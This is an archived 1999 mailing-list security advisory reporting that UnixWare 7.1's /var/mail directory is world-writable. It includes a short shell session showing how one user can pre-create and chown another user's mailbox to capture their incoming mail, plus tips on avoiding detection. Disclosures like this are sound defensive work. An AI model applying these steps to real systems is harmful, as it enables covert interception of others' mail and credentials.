UnixWare read/modify users' mail

From: Brock Tellier (btellierat_private)
Date: Fri Dec 03 1999 - 20:03:43 PST

Next message: Brock Tellier: "UnixWare and the dacread permission"

Previous message: Christopher Schulte: "Re: Insecure default permissions for MailMan Professional Edition,"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

OVERVIEW
Any user can read/modify others' mail.

BACKGROUND
Only UnixWare 7.1 was tested.

DETAILS
Imagine my suprise when I saw that /var/mail was mode 777.  As such, any
user may create a file called /var/mail/<username> with a mode readable by
him and trap all incoming mail.  Afraid of getting caught? chown the file
to <username> (see my advisory on this subject), leaving it still
world-readable, and no one will ever know who did it.  

All of this assumes, of course, that the user has not recieved any mail
yet.  If you keep track of your /etc/passwd file, you can monitor for new
entries and create the files as needed.

This permissions problem obviously opens the door for all sorts of
problems with symlinks and such.  I would imagine that some mail delivery
programs which aren't as smart as sendmail will follow symlinks in
/var/mail.

And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG
LIE:

bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$ 

;)

EXPLOIT

bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other             0 Dec  4 07:54 btellier

Now wait for btellier to get some mail...

bash-2.02$ ls -la btellier
-rw-r--r--    1 btellier other           410 Dec  4 07:55 btellier
bash-2.02$ cat btellier
>From root Sat Dec  4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status: 
X-Status: 
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52

your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$ 

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellierat_private

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

Next message: Brock Tellier: "UnixWare and the dacread permission"
Previous message: Christopher Schulte: "Re: Insecure default permissions for MailMan Professional Edition,"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:58 PDT